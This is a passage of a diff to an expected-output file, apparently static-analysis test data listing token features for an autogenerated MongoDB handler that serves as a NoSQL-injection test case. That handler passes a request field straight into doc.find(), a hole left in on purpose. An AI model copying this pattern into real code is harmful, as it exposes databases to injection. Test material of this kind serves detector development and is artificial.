autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:18 | query | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:18 | query | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:18 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:18 | query = {} | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:18 | query = {} | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:18 | query = {} | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:18 | query = {} | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:9:106:18 | query = {} | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:17:106:18 | {} | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:17:106:18 | {} | contextSurroundingFunctionParameters | (queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:17:106:18 | {} | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:17:106:18 | {} | enclosingFunctionName | useQuery | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:106:17:106:18 | {} | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:7 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:7 | query | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:7 | query | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:7 | query | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:7 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:13 | query.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:13 | query.title | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:13 | query.title | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:13 | query.title | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:13 | query.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:29 | query.t ... s.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:29 | query.t ... s.title | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:29 | query.t ... s.title | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:29 | query.t ... s.title | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:3:107:29 | query.t ... s.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:9:107:13 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:9:107:13 | title | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:9:107:13 | title | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:9:107:13 | title | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:9:107:13 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:23 | queries | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:23 | queries | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:23 | queries | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:23 | queries | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:23 | queries | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:29 | queries.title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:29 | queries.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:29 | queries.title | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:29 | queries.title | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:29 | queries.title | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:17:107:29 | queries.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:25:107:29 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:25:107:29 | title | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:25:107:29 | title | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:25:107:29 | title | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:107:25:107:29 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:108:13 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:108:13 | MongoClient | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:108:13 | MongoClient | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:108:13 | MongoClient | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:108:13 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:108:21 | MongoClient.connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:108:21 | MongoClient.connect | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:108:21 | MongoClient.connect | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:108:21 | MongoClient.connect | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:108:21 | MongoClient.connect | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:113:4 | MongoCl ... );\\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:113:4 | MongoCl ... );\\n }) | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:113:4 | MongoCl ... );\\n }) | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:113:4 | MongoCl ... );\\n }) | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:113:4 | MongoCl ... );\\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:113:4 | exceptional return of MongoCl ... );\\n }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:113:4 | exceptional return of MongoCl ... );\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:113:4 | exceptional return of MongoCl ... );\\n }) | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:113:4 | exceptional return of MongoCl ... );\\n }) | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:3:113:4 | exceptional return of MongoCl ... );\\n }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:15:108:21 | connect | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:15:108:21 | connect | contextSurroundingFunctionParameters | (queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:15:108:21 | connect | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:15:108:21 | connect | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:15:108:21 | connect | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:23:108:54 | 'mongod ... 7/test' | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:23:108:54 | 'mongod ... 7/test' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:23:108:54 | 'mongod ... 7/test' | calleeImports | mongodb | @@ -1961,6 +10605,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:23:108:54 | 'mongod ... 7/test' | enclosingFunctionName | useQuery | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:23:108:54 | 'mongod ... 7/test' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:23:108:54 | 'mongod ... 7/test' | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:108:56 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:108:56 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:108:56 | query | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:108:56 | query | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:108:56 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | 'arguments' object of anonymous function | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | 'arguments' object of anonymous function | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | 'arguments' object of anonymous function | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | (err, d ... y);\\n } | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | (err, d ... y);\\n } | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | (err, d ... y);\\n } | calleeImports | mongodb | @@ -1970,6 +10624,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | (err, d ... y);\\n } | enclosingFunctionName | useQuery | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | (err, d ... y);\\n } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | (err, d ... y);\\n } | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | exceptional return of anonymous function | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | exceptional return of anonymous function | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | return of anonymous function | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | return of anonymous function | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:57:113:3 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:58:108:60 | err | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:58:108:60 | err | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:58:108:60 | err | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:58:108:60 | err | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:58:108:60 | err | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:63:108:64 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:63:108:64 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:63:108:64 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:63:108:64 | db | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:63:108:64 | db | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:63:108:64 | db | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:63:108:64 | db | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:63:108:64 | db | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:63:108:64 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:108:63:108:64 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:11 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:11 | doc | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:11 | doc | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:11 | doc | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:11 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:34 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:34 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:34 | doc | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:34 | doc | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:34 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:34 | doc = d ... ('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:34 | doc = d ... ('doc') | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:34 | doc = d ... ('doc') | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:34 | doc = d ... ('doc') | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:9:109:34 | doc = d ... ('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:16 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:16 | db | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:16 | db | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:16 | db | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:16 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:27 | db.collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:27 | db.collection | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:27 | db.collection | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:27 | db.collection | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:27 | db.collection | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:34 | db.collection('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:34 | db.collection('doc') | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:34 | db.collection('doc') | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:34 | db.collection('doc') | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:34 | db.collection('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:34 | exceptional return of db.collection('doc') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:34 | exceptional return of db.collection('doc') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:34 | exceptional return of db.collection('doc') | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:34 | exceptional return of db.collection('doc') | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:15:109:34 | exceptional return of db.collection('doc') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:18:109:27 | collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:18:109:27 | collection | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:18:109:27 | collection | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:18:109:27 | collection | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:18:109:27 | collection | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:29:109:33 | 'doc' | CalleeFlexibleAccessPath | db.collection | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:29:109:33 | 'doc' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:29:109:33 | 'doc' | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1978,6 +10697,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:29:109:33 | 'doc' | enclosingFunctionName | useQuery | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:29:109:33 | 'doc' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:109:29:109:33 | 'doc' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:7 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:7 | doc | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:7 | doc | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:7 | doc | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:7 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:12 | doc.find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:12 | doc.find | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:12 | doc.find | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:12 | doc.find | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:12 | doc.find | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:19 | doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:19 | doc.find(query) | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:19 | doc.find(query) | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:19 | doc.find(query) | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:19 | doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:19 | exceptional return of doc.find(query) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:19 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:19 | exceptional return of doc.find(query) | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:19 | exceptional return of doc.find(query) | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:5:112:19 | exceptional return of doc.find(query) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:9:112:12 | find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:9:112:12 | find | contextSurroundingFunctionParameters | (queries)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:9:112:12 | find | enclosingFunctionBody | queries query query title queries title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:9:112:12 | find | enclosingFunctionName | useQuery | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:9:112:12 | find | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:14:112:18 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:14:112:18 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:14:112:18 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1986,24 +10730,145 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:14:112:18 | query | enclosingFunctionName | useQuery | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:14:112:18 | query | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:112:14:112:18 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb_bodySafe.js:1:1:1:0 | this | fileImports | body-parser express mongodb | +| 